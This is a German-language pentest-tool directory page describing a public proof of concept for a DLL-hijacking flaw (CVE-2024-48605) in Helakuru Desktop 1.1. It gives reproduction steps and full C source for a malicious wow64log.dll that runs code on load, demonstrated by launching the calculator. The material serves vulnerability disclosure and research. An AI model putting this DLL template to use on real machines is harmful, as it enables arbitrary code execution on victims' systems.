Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HelakuruV.1.1-DLLHijack — Helakuru Version 1.1 DLL-Hijack - CVE-2024-48605 | Kitploit
Tools/GitHubGitHub/surajhacx/helakuruv.1.1-dllhijack
SchwachstellenanalyseCode-AnalyseExploitationPayload-EntwicklungBinary-Exploitation
GitHubsurajhacx/helakuruv.1.1-dllhijack

HelakuruV.1.1-DLLHijack

Helakuru Version 1.1 DLL-Hijack - CVE-2024-48605

Repository anzeigen
535vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

DLL-Hijacking-Sicherheitslücke in Helakuru

Zusammenfassung

Die Helakuru Desktop-Version 1.1v läuft sowohl auf 64-Bit- als auch auf 32-Bit-Architekturen. Bei Tests wurde festgestellt, dass das Programm versucht, wow64log.dll zu laden, das standardmäßig in modernen Windows-Betriebssystemen nicht enthalten ist. Dies führt zu einem Fehler „Name nicht gefunden“ und macht das Programm anfällig für DLL-Hijacking. Durch die Erstellung einer schädlichen wow64log.dll kann beliebiger Code ausgeführt werden.

Betroffene Version

Helakuru Desktop 1.1v

Schritte zur Reproduktion

  1. DLL-Ladung mit ProcMon überwachen
  • ProcMon zeigt den CreateFile-Vorgang mit „Name not found“ für wow64log.dll Pasted image 20240925232040
  1. Erstellen einer schädlichen wow64log.dll
root@kitploit:~
#include <windows.h>
#include <stdio.h>

void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    const char* calcCmd = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,          
        (LPSTR)calcCmd, 
        NULL,          
        NULL,          
        FALSE,         
        0,             
        NULL,          
        NULL,          
        &si,           
        &pi))          
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
  1. Helakuru Desktop ausführen
  • Starten Sie Helakuru Desktop erneut. Die schädliche wow64log.dll wird nun in das Programm geladen und löst den Rechner als Demonstration einer erfolgreichen DLL-Injection aus. Pasted image 20240925233737
  1. DLL-Ladung mit ProcMon überprüfen
  • Öffnen Sie ProcMon erneut und beobachten Sie, dass wow64log.dll diesmal erfolgreich geladen wird. Dies bestätigt, dass die benutzerdefinierte DLL vom Programm ausgeführt wurde. Pasted image 20240925232728

Auswirkung: Diese Sicherheitslücke ermöglicht die Ausführung beliebigen Codes.

Tool herunterladen